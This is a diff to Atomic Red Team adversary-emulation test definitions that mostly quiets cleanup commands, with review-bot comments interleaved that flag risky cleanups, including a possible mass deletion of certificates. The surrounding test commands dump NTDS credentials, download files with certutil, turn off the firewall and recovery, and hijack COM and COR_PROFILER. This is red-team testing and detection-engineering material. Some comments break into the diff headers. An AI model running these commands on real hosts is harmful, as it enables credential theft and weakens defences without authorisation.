diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 6d7938e1..9237d5e7 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -108,7 +108,7 @@ atomic_tests:
 mkdir #{output_folder}
 ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
 cleanup_command: |
- rmdir /q /s #{output_folder}
+ rmdir /q /s #{output_folder} >nul 2>&1
 name: command_prompt
 elevation_required: true
diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml
index bb8989a6..4d51de53 100644
--- a/atomics/T1090.001/T1090.001.yaml
+++ b/atomics/T1090.001/T1090.001.yaml
@@ -79,7 +79,7 @@ atomic_tests:
 default: "1337"
 executor:
 command: netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
- cleanup_command: netsh interface portproxy delete v4tov4 listenport=#{listenport}
+ cleanup_command: netsh interface portproxy delete v4tov4 listenport=#{listenport} -ErrorAction Ignore | Out-Null
 name: powershell
 elevation_required: true
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index ca91eca7..b8f19df4 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -188,7 +188,7 @@ atomic_tests:
 command: |
 cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
 cleanup_command: |
- del #{local_path}
+ del #{local_path} >nul 2>&1
 name: command_prompt
 - name: certutil download (verifyctl)
 auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml
index fee56889..a2d74e8c 100644
--- a/atomics/T1119/T1119.yaml
+++ b/atomics/T1119/T1119.yaml
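Review bot: `rmdir /q /s #{output_folder} >nul 2>&1` discards the only signal that the NTDS IFM dump was not removed, and that directory holds exactly the credential material a reviewer needs to be sure is gone once the test ends. The same trade-off applies to the cleanups in T1490 (boot recovery re-enabled), T1562.001 (Office ProtectedView key restored) and the first T1562.004 hunk (firewall profile switched back on): a silently failed cleanup leaves the host in the weakened state the test created. For the command_prompt executors a one-line check after the redirect keeps the noise out while still reporting a real failure, e.g. `if exist #{output_folder} echo cleanup failed: #{output_folder} still present`.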
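Review bot: `-ErrorAction Ignore` on the new T1090.001 cleanup line is a PowerShell common parameter, but the command is netsh.exe, so PowerShell hands `-ErrorAction` and `Ignore` to netsh as two extra literal arguments; netsh will most likely reject the whole command and the portproxy listener on `#{listenport}` stays in place, which is the opposite of what a cleanup should achieve. A native executable has to be silenced by stream redirection instead, e.g. `cleanup_command: netsh interface portproxy delete v4tov4 listenport=#{listenport} *>$null`, the form the T1562.002 hunk in this same commit already uses for appcmd.exe. The trailing `| Out-Null` becomes unnecessary once all streams are redirected.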
@@ -28,7 +28,7 @@ atomic_tests:
 New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
 Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
 cleanup_command: |
- Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null
+ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null
 name: powershell
 - name: Recon information for export with PowerShell
 auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml
index 0c907b95..3231d454 100644
--- a/atomics/T1219/T1219.yaml
+++ b/atomics/T1219/T1219.yaml
@@ -14,9 +14,10 @@ atomic_tests:
 Start-Process $file1 /S;
 Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'
 cleanup_command: |-
- Start-Process 'C:\Program Files (x86)\TeamViewer\uninstall.exe' "/S"
+ $file = 'C:\Program Files (x86)\TeamViewer\uninstall.exe'
+ if(Test-Path $file){ Start-Process $file "/S" -ErrorAction Ignore | Out-Null }
 $file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe"
- Remove-Item $file1
+ Remove-Item $file1 -ErrorAction Ignore | Out-Null
 name: powershell
 elevation_required: true
 - name: AnyDesk Files Detected Test on Windows
@@ -32,7 +33,7 @@ atomic_tests:
 Start-Process $file1 /S;
 cleanup_command: |-
 $file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe.exe"
- Remove-Item $file1
+ Remove-Item $file1 -ErrorAction Ignore
 name: powershell
 elevation_required: true
 - name: LogMeIn Files Detected Test on Windows
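Review bot: The new guarded line in the first T1219 hunk launches the TeamViewer uninstaller with `Start-Process` but never waits for it, so the cleanup returns while the uninstall is still running, and the `| Out-Null` after it is redundant because `Start-Process` emits nothing unless `-PassThru` is given. Adding `-Wait` keeps the cleanup synchronous so a following run does not find a half-removed install: `if(Test-Path $file){ Start-Process $file "/S" -Wait -ErrorAction Ignore }`.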
@@ -48,9 +49,9 @@ atomic_tests:
 Start-Process $file1 /S;
 Start-Process 'C:\Program Files (x86)\LogMeInIgnition\LMIIgnition.exe' "/S"
 cleanup_command: |-
- get-package *'LogMeIn Client'* | uninstall-package
+ get-package *'LogMeIn Client'* -ErrorAction Ignore | uninstall-package
 $file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi"
- Remove-Item $file1
+ Remove-Item $file1 -ErrorAction Ignore
 name: powershell
 elevation_required: true
diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index e5a4705d..d0f6568e 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -61,8 +61,8 @@ atomic_tests:
 bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
 bcdedit.exe /set {default} recoveryenabled no
 cleanup_command: |
- bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
- bcdedit.exe /set {default} recoveryenabled yes
+ bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures >nul 2>&1
+ bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
 name: command_prompt
 elevation_required: true
 - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
diff --git a/atomics/T1505.002/T1505.002.yaml b/atomics/T1505.002/T1505.002.yaml
index 3c87a7ee..a2ccdea4 100644
--- a/atomics/T1505.002/T1505.002.yaml
+++ b/atomics/T1505.002/T1505.002.yaml
@@ -34,8 +34,10 @@ atomic_tests:
 Enable-TransportAgent #{transport_agent_identity}
 Get-TransportAgent | Format-List Name,Enabled
 cleanup_command: |
- Disable-TransportAgent #{transport_agent_identity}
- Uninstall-TransportAgent #{transport_agent_identity}
- Get-TransportAgent
+ if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){
+ Disable-TransportAgent #{transport_agent_identity}
+ Uninstall-TransportAgent #{transport_agent_identity}
+ Get-TransportAgent
+ }
 name: powershell
 elevation_required: true
diff --git a/atomics/T1546.001/T1546.001.yaml b/atomics/T1546.001/T1546.001.yaml
index 09749cde..235eff3d 100644
--- a/atomics/T1546.001/T1546.001.yaml
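Review bot: In the T1505.002 hunk the `Get-Command` guard only establishes that the Exchange cmdlets are available; inside it, `Disable-TransportAgent` and `Uninstall-TransportAgent` still run without `-ErrorAction Ignore`, so when the agent named by `#{transport_agent_identity}` was never registered (a cleanup run before the test, or after a failed one) they still raise the errors this commit sets out to silence. Adding the parameter to those two lines makes the block consistent with the rest of the change: `Disable-TransportAgent #{transport_agent_identity} -ErrorAction Ignore` and `Uninstall-TransportAgent #{transport_agent_identity} -ErrorAction Ignore`.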
+++ b/atomics/T1546.001/T1546.001.yaml
@@ -22,6 +22,6 @@ atomic_tests:
 command: |
 assoc #{extension_to_change}=#{target_extension_handler}
 cleanup_command: |
- assoc .hta=htafile
+ assoc .hta=htafile >nul 2>&1
 name: command_prompt
diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml
index c51e61f5..5ad17c68 100644
--- a/atomics/T1546.010/T1546.010.yaml
+++ b/atomics/T1546.010/T1546.010.yaml
@@ -41,6 +41,6 @@ atomic_tests:
 command: |
 reg.exe import #{registry_file}
 cleanup_command: |
- reg.exe import #{registry_cleanup_file}
+ reg.exe import #{registry_cleanup_file} >nul 2>&1
 name: command_prompt
 elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1546.011/T1546.011.yaml b/atomics/T1546.011/T1546.011.yaml
index 70d75b28..a43a59bb 100644
--- a/atomics/T1546.011/T1546.011.yaml
+++ b/atomics/T1546.011/T1546.011.yaml
@@ -36,7 +36,7 @@ atomic_tests:
 command: |
 sdbinst.exe #{file_path}
 cleanup_command: |
- sdbinst.exe -u #{file_path}
+ sdbinst.exe -u #{file_path} >nul 2>&1
 name: command_prompt
 elevation_required: true
 - name: New shim database files created in the default shim database directory
diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml
index a03a1806..9e507c5d 100644
--- a/atomics/T1546.015/T1546.015.yaml
+++ b/atomics/T1546.015/T1546.015.yaml
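Review bot: The T1546.001 cleanup still restores a fixed `.hta=htafile` while the test changes `#{extension_to_change}`, and the new `>nul 2>&1` now also hides the `assoc` echo that would have shown which association was actually touched; if a caller overrides the input, the hijacked handler persists silently. Either document on the input that `extension_to_change` is expected to remain `.hta`, or make the cleanup follow the same input — the original handler can only be restored faithfully if it is captured before the change, which `assoc #{extension_to_change}` prints.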
@@ -39,11 +39,10 @@ atomic_tests:
 Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
 START MMC.EXE EVENTVWR.MSC
 cleanup_command: |
- Write-Host "Removing registry keys" -ForegroundColor Cyan
- Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
- Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
- Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
- Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
+ Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
 name: powershell
 - name: COM Hijack Leveraging System Scope COR_PROFILER
 auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
@@ -79,10 +78,9 @@ atomic_tests:
 New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
 New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
 cleanup_command: |
- Write-Host "Removing system environment variables" -ForegroundColor Cyan
- Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force | Out-Null
- Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force | Out-Null
- Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force | Out-Null
+ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
 name: powershell
 elevation_required: true
 - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
diff --git a/atomics/T1551.006/T1551.006.yaml b/atomics/T1551.006/T1551.006.yaml
index a043c130..b793b6e9 100644
--- a/atomics/T1551.006/T1551.006.yaml
+++ b/atomics/T1551.006/T1551.006.yaml
@@ -205,8 +205,6 @@ atomic_tests:
 import-module #{file_path}\timestomp.ps1
 timestomp -dest "#{file_path}\kxwn.lock"
 cleanup_command: |-
- Write-Host "Removing #{file_path}\timestomp.ps1"
 Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
- Write-Host "Removing #{file_path}\kxwn.lock"
 Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
 name: powershell
\ No newline at end of file
diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml
index 399fec08..656227af 100644
--- a/atomics/T1553.004/T1553.004.yaml
+++ b/atomics/T1553.004/T1553.004.yaml
@@ -107,7 +107,7 @@ atomic_tests:
 if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 get_prereq_command: |
 $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
- Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path}
+ Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
 Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
 executor:
 command: |
@@ -115,7 +115,7 @@ atomic_tests:
 Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
 cleanup_command: |
 $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
- Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
- Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item
- name: command_prompt
+ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ name: powershell
 elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index ef5ebb86..5899294d 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
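Review bot: In the second T1553.004 hunk, if `Import-Certificate` fails — for instance because `#{pfx_path}` does not exist when cleanup runs before the prerequisite or after a failed test — `$cert` is `$null`, `$($cert.Thumbprint)` expands to an empty string, and the two `Get-ChildItem` lines resolve to `Cert:\LocalMachine\My\` and `Cert:\LocalMachine\Root\`, which enumerate every certificate in the machine's personal and trusted-root stores and pipe all of them into `Remove-Item`. The newly added `-ErrorAction Ignore` on both sides of the pipe makes that mass deletion quieter rather than preventing it. The cleanup should touch the stores only when a thumbprint was actually obtained, as below; `Import-Certificate` itself can then carry the `-ErrorAction Ignore` the rest of the commit uses.
```yaml
    cleanup_command: |
      $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
      if ($cert -and $cert.Thumbprint) {
        Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
        Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
      }
```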
@@ -297,7 +297,7 @@ atomic_tests:
 Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
 name: powershell
 elevation_required: true
-- name: Disable Microft Office Security Features
+- name: Disable Microsoft Office Security Features
 auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
 description: |
 Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
@@ -317,8 +317,8 @@ atomic_tests:
 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
 New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
 cleanup_command: |
- Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
- Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
+ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
+ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
 name: powershell
 - name: Remove Windows Defender Definition Files
 auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml
index 9743565f..4c844efc 100644
--- a/atomics/T1562.002/T1562.002.yaml
+++ b/atomics/T1562.002/T1562.002.yaml
@@ -17,5 +17,7 @@ atomic_tests:
 command: |
 C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
 cleanup_command: |
- C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
+ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
+ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
+ }
 name: powershell
\ No newline at end of file
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index 116cdec6..cb52d1d4 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -31,7 +31,7 @@ atomic_tests:
 command: |
 netsh advfirewall set currentprofile state off
 cleanup_command: |
- netsh advfirewall set currentprofile state on
+ netsh advfirewall set currentprofile state on >nul 2>&1
 name: command_prompt
 - name: Allow SMB and RDP on Microsoft Defender Firewall
 auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
@@ -45,7 +45,7 @@ atomic_tests:
 netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
 netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
 cleanup_command: |
- netsh advfirewall reset
+ netsh advfirewall reset >nul 2>&1
 name: command_prompt
 - name: Opening ports for proxy - HARDRAIN
 auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
@@ -58,6 +58,6 @@ atomic_tests:
 executor:
 command: |
 netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450
- cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450
+ cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1
 name: command_prompt
 elevation_required: true
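Review bot: `netsh advfirewall reset >nul 2>&1` in the second T1562.004 hunk restores the whole Windows Defender Firewall policy to out-of-box defaults rather than undoing the two rule-group changes the test made, so any rules the host had before the test are discarded, and the added redirect now hides even the confirmation that the reset ran. A targeted revert limits the cleanup to what the test touched: `netsh advfirewall firewall set rule group="remote desktop" new enable=No` and `netsh advfirewall firewall set rule group="file and printer sharing" new enable=No`, on the assumption that both groups were disabled before the test, which is the pre-state the test presupposes. The third hunk in this file already follows that pattern by deleting only the rule it created.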